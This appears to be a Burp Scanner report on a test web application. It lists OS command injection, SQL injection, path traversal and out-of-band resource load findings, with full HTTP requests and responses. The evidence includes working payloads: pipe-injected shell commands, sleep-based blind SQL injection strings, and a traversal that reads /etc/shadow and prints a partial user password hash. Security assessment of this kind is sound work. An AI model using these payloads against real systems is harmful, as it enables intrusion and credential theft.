Burp Scanner Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

                          Confidence
Severity       Certain   Firm   Tentative   Total
High                21     18           0      39
Medium               0      0           0       0
Low                  9      0           0       9
Information         63     30           3      96

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

[Bar chart: number of issues (0 to 40) per severity level: High, Medium, Low]

Contents

1. High severity issues
1.1. OS command injection
1.2. SQL injection
1.3. File path traversal
1.4. Out-of-band resource load (HTTP)
1.5. Cross-site scripting (reflected)
1.6. Cross-origin resource sharing: arbitrary origin trusted
1.7. Cleartext submission of password
1.8. External service interaction (DNS)
1.9. External service interaction (HTTP)

2. Low severity issues
2.1. Password submitted using GET method
2.2. Password field with autocomplete enabled
2.3. Unencrypted communications

3. Informational issues
3.1. Cross-origin resource sharing
3.2. Cross-site request forgery
3.3. X-Forwarded-For dependent response
3.4. User agent-dependent response
3.5. Cross-domain Referer leakage
3.6. Cross-domain script include
3.7. Cookie without HttpOnly flag set
3.8. File upload functionality
3.9. Frameable response (potential Clickjacking)
3.10. Browser cross-site scripting filter disabled
3.11. Private IP addresses disclosed
3.12. Robots.txt file

1. High severity issues
1.1. OS command injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /sys-test.php

Issue detail

The test parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands and retrieve the output in the application's responses.

The payload |echo khvy1hpese bigotxf4l4||a #' |echo khvy1hpese bigotxf4l4||a #|" |echo khvy1hpese bigotxf4l4||a # was submitted in the test parameter. The application's response appears to contain the output from the injected command, indicating that the command was executed.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to execute commands other than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

Request

GET /sys-test.php?test=127.0.0.1%2c8.8.8.8%2cgoogle.com|echo%20khvy1hpese%20bigotxf4l4||a%20%23'%20|echo%20khvy1hpese%20bigotxf4l4||a%20%23|"%20|echo%20khvy1hpese%20bigotxf4l4||a%20%23 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:31 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 155
Connection: close
Content-Type: text/html; charset=UTF-8

round-trip min/avg/max/stddev = 0.052/0.052/0.052/0.000 ms</br>round-trip min/avg/max/stddev = 15.061/15.061/15.061/0.000 ms</br>khvy1hpese bigotxf4l4</br>
1.2. SQL injection

There are 17 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

References



1.2.1. http://10.250.200.5:81/register [username parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload '+(select*from(select(sleep(20)))a)+' was submitted in the username parameter. The application took 20051 milliseconds to respond to the request, compared with 63 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

POST /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/register
Content-Type: multipart/form-data; boundary=--------952112201
Content-Length: 965
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

----------952112201
Content-Disposition: form-data; name="password"


----------952112201
Content-Disposition: form-data; name="website"


----------952112201
Content-Disposition: form-data;
...[SNIP]...
ntent-Disposition: form-data; name="pgpid"


----------952112201
Content-Disposition: form-data; name="primaryschool"


----------952112201
Content-Disposition: form-data; name="username"

'+(select*from(select(sleep(20)))a)+'
----------952112201
Content-Disposition: form-data; name="highschool"


----------952112201--

Response

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:42 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2319
Connection: close
Content-Type: text/html; charset=UTF-8

Error: User creation failed<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/sty
...[SNIP]...
1.2.2. http://10.250.200.5:81/search [query parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search

Issue detail

The query parameter appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the query parameter. The application took 20127 milliseconds to respond to the request, compared with 78 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

POST /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

query=555-555-0199@example.com'%20and%20(select*from(select(sleep(20)))a)--%20

Response

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:47 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2348
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com&#039; and (select*from(select(sleep(20)))a)-- - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 st
...[SNIP]...
1.2.3. http://10.250.200.5:81/search [query parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search

Issue detail

The query parameter appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the query parameter. The application took 20048 milliseconds to respond to the request, compared with 110 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

GET /search?query=555-555-0199@example.com'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/search
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:50:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2348
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com&#039; and (select*from(select(sleep(20)))a)-- - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 st
...[SNIP]...
1.2.4. http://10.250.200.5:81/search/search [query parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /search/search

Issue detail

The query parameter appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the query parameter. The application took 20120 milliseconds to respond to the request, compared with 94 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request

GET /search/search?query=555-555-0199@example.com'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/search/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:51:39 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2348
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com&#039; and (select*from(select(sleep(20)))a)-- - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 st
...[SNIP]...
1.2.5. http://10.250.200.5:81/sys2_test.php [test parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Issue detail

The test parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the test parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /sys2_test.php?test=' HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:18 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2773
Connection: close
Content-Type: text/html; charset=UTF-8

error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1<!doctype html>
<html pmbx_context="68E2
...[SNIP]...

Request 2

GET /sys2_test.php?test='' HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:18 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2613
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
1.2.6. http://10.250.200.5:81/user/jyoti.ermine [URL path filename]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/jyoti.ermine'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.7. http://10.250.200.5:81/user/jyoti.ermine/ [URL path folder 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/jyoti.ermine'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.8. http://10.250.200.5:81/user/marge.aphrodite [URL path filename]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/marge.aphrodite'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.9. http://10.250.200.5:81/user/marge.aphrodite [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the name of an arbitrarily supplied URL parameter. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/marge.aphrodite?1(select*from(select(sleep(20)))a)=1 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.10. http://10.250.200.5:81/user/marge.aphrodite/ [URL path folder 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/marge.aphrodite'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.11. http://10.250.200.5:81/user/rica.orpah [URL path filename]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/rica.orpah'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.12. http://10.250.200.5:81/user/rica.orpah/ [URL path folder 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/rica.orpah'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.13. http://10.250.200.5:81/user/ricca.gilud [URL path filename]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/ricca.gilud'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.14. http://10.250.200.5:81/user/ricca.gilud/ [URL path folder 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/ricca.gilud'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.15. http://10.250.200.5:81/user/stephi.fonda [URL path filename]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda

Issue detail

The URL path filename appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path filename. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/stephi.fonda'%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.16. http://10.250.200.5:81/user/stephi.fonda/ [URL path folder 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/

Issue detail

The URL path folder 2 appears to be vulnerable to SQL injection attacks. The payload ' and (select*from(select(sleep(20)))a)-- was submitted in the URL path folder 2. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/stephi.fonda'%20and%20(select*from(select(sleep(20)))a)--%20/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

1.2.17. http://10.250.200.5:81/user/stephi.fonda/me.jpg [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/me.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '(select*from(select(sleep(20)))a)' was submitted in the User-Agent HTTP header. The application timed out when responding to the request, indicating that the injected SQL command caused a time delay.

The database appears to be MySQL.

Request 1

GET /user/stephi.fonda/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'(select*from(select(sleep(20)))a)'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

1.3. File path traversal

Summary

Severity:   High
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the f parameter. The requested file was returned in the application's response. Note that disclosure of the shadow file may allow an attacker to discover users' passwords.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is typically a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved by referencing known files via an index number rather than their name, and using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defense can be employed to prevent path traversal attacks:

Request 1

GET /contactus.php?f=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2383
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
<td>root:*:17448:0:99999:7:::
daemon:*:17448:0:99999:7:::
bin:*:17448:0:99999:7:::
sys:*:17448:0:99999:7:::
sync:*:17448:0:99999:7:::
games:*:17448:0:99999:7:::
man:*:17448:0:99999:7:::
lp:*:17448:0:99999:7:::
mail:*:17448:0:99999:7:::
news:*:17448:0:99999:7:::
uucp:*:17448:0:99999:7:::
proxy:*:17448:0:99999:7:::
www-data:*:17448:0:99999:7:::
backup:*:17448:0:99999:7:::
list:*:17448:0:99999:7:::
irc:*:17448:0:99999:7:::
gnats:*:17448:0:99999:7:::
nobody:*:17448:0:99999:7:::
systemd-timesync:*:17448:0:99999:7:::
systemd-network:*:17448:0:99999:7:::
systemd-resolve:*:17448:0:99999:7:::
systemd-bus-proxy:*:17448:0:99999:7:::
marge.aphrodite:CX1dGnBxH.Yq6
...[SNIP]...
1.4. Out-of-band resource load (HTTP)

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Issue detail

It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response.

The payload http://a9k2e37z36j226d1tfh328gcv31v3jt7kuaiz.burpcollaborator.net/?contact.txt was submitted in the f parameter.

The application performed an HTTP request to the specified domain. The response from that request was then included in the application's own response.

Issue background

Out-of-band resource load arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s). The ability to trigger arbitrary out-of-band resource load does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.

The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Additionally, the application's processing of web content that is retrieved from arbitrary URLs exposes some important and non-conventional attack surface. An attacker can deploy a web server that returns malicious content, and then induce the application to retrieve and process that content. This processing might give rise to the types of input-based vulnerabilities that are normally found when unexpected input is submitted directly in requests to the application. The out-of-band attack surface that the application exposes should be thoroughly tested for these types of vulnerabilities.

Issue remediation

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary out-of-band resource load is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. You should also ensure that content retrieved from other systems is processed in a safe manner, with the usual precautions that are applicable when processing input from direct incoming web requests.

If the ability to trigger arbitrary out-of-band resource load is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist.

Request 1

